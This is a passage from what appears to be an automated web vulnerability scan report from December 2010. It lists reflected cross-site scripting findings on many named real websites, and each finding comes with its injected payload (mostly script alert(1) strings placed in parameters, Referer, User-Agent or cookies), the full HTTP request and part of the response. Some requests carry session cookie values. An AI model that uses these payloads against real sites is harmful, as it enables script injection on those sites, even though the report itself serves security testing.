<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/starbucks-gold?4be80" style=x:expression(alert(1)) 6a22aa5aef0=1"/> ...[SNIP]...
4.289. http://www.stltoday.com/blogzone/morning-skate/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.stltoday.com
Path:
/blogzone/morning-skate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e50f1-->964848935ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blogzone/morning-skate/?e50f1-->964848935ee=1 HTTP/1.1 Host: www.stltoday.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.290. http://www.ucsc-extension.edu/programs/bioinformatics [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.ucsc-extension.edu
Path:
/programs/bioinformatics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea15f"><a>6f30bf8805a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/bioinformatics?ea15f"><a>6f30bf8805a=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:50:44 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:50:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26741
4.291. http://www.ucsc-extension.edu/programs/biotechnology [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ucsc-extension.edu
Path: /programs/biotechnology
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70921"><a>a4370fc8d9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/biotechnology?70921"><a>a4370fc8d9c=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:51:44 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:51:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26146
4.292. http://www.ucsc-extension.edu/programs/medical-devices [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ucsc-extension.edu
Path: /programs/medical-devices
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc147"><a>453003d89af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/medical-devices?bc147"><a>453003d89af=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:51:20 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:51:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23208
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2de55"><script>alert(1)</script>7a8f70f760d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 2de55"><script>alert(1)</script>7a8f70f760d
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:05:36 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Gestaltung&blogurl=2de55"><script>alert(1)</script>7a8f70f760d&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 111ff<script>alert(1)</script>2b227afd836 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <br> The exception [no protocol: 111ff<script>alert(1)</script>2b227afd836] was caught at: <br> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 542d3"-alert(1)-"7f554e65bd4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a class='registerLink' href=" + MNGiRegistrationLoginUrl + "?url=http://www.google.com/search?hl=en&q=542d3"-alert(1)-"7f554e65bd4&register=yes> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc78'-alert(1)-'2d186abb80a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9fc78'-alert(1)-'2d186abb80a
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:26:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D9fc78%27%2Dalert%281%29%2D%272d186abb80a; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDSQDRBASS=IPFCIJICJNEBJPECEFHNFLOE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f4e4"-alert(1)-"80fdf312bed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2f4e4"-alert(1)-"80fdf312bed
Response (redirected)
HTTP/1.1 200 OK Cache-Control: public Content-Length: 66751 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Date: Wed, 08 Dec 2010 01:31:47 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Fri, 07-Jan-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... nterest = "health"; var selInterestSub = "aches-pains"; var hurrBasin = ""; var hurrStorm = "";
var adc_partner = 'accuweather'; var agiPageRef = "http://www.google.com/search?hl=en&q=2f4e4"-alert(1)-"80fdf312bed";
var adGoogleFile = 'forecast'; var adGoogleTraveler = "0"; var adGoogleInsertLinks = false; var adGoogleLinksHTML = '';
var adWeaIconDay1 = ""; var adWeaIconCurr = ""; var ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd582"-alert(1)-"580f3a21662 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd582"-alert(1)-"580f3a21662
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 65978 Content-Type: text/html Cache-Control: public Date: Wed, 08 Dec 2010 01:31:12 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Fri, 07-Jan-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... nterest = "health"; var selInterestSub = "aches-pains"; var hurrBasin = ""; var hurrStorm = "";
var adc_partner = 'accuweather'; var agiPageRef = "http://www.google.com/search?hl=en&q=bd582"-alert(1)-"580f3a21662";
var adGoogleFile = ''; var adGoogleTraveler = "0"; var adGoogleInsertLinks = false; var adGoogleLinksHTML = '';
var adWeaIconDay1 = ""; var adWeaIconCurr = ""; var adHTemp ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e95"><script>alert(1)</script>37abf567123 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=83e95"><script>alert(1)</script>37abf567123
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:50 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=83e95"><script>alert(1)</script>37abf567123" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e2e62<script>alert(1)</script>b87e9505e3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2e62<script>alert(1)</script>b87e9505e3f
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:51 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>e2e62<script>alert(1)</script>b87e9505e3f - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf30"><script>alert(1)</script>869f99d7ee2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dbf30"><script>alert(1)</script>869f99d7ee2 Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=lrut15yo2hhcicrjpzcpovph; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 01:31:28 GMT Connection: close Content-Length: 69450
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dbf30"><script>alert(1)</script>869f99d7ee2" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b3b0'-alert(1)-'127eac430ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 2b3b0'-alert(1)-'127eac430ed
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... ":1,"tag":"YP"},{"count":1,"tag":".........."}]); var feedHistory = new Object(); var pageParams = new Object(); pageParams['currentPagePath'] = 'protopage/autocreate'; pageParams['autoAddFeedUrl'] = '2b3b0'-alert(1)-'127eac430ed'; pageParams['pagePathAttempted'] = 'protopage/autocreate'; var categories = [{ "id": 1, "virtualPages": [], "sharing": {"type": "public"}, "label": "My public category", "schemeOffset": " ...[SNIP]...
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8422"-alert(1)-"d14b138d089 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4453"-alert(1)-"9e9f00070e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4a15"-alert(1)-"4c6ffee1842 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload b3de5<script>alert(1)</script>f8789a7faf3 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=3e3577f-12cc309077b-2ca9e758-1&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.8977a5c7be5630214d328a2ac3111917.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==b3de5<script>alert(1)</script>f8789a7faf3
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Wed, 08 Dec 2010 00:30:17 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Content-Length: 639
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==b3de5<script>alert(1)</script>f8789a7faf3 userid: </div> ...[SNIP]...
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bba24'><script>alert(1)</script>4a0218b962f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwbba24'><script>alert(1)</script>4a0218b962f;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=rrWYM13LTfVMnsHDSBzWTTGyQ6910mh0Jxnr2xc1J3gwQk2QH1JQ!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:40 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwbba24'><script>alert(1)</script>4a0218b962f; expires=Wednesday, 08-Dec-2010 08:14:40 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f65fc'><script>alert(1)</script>15a86c66cff was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
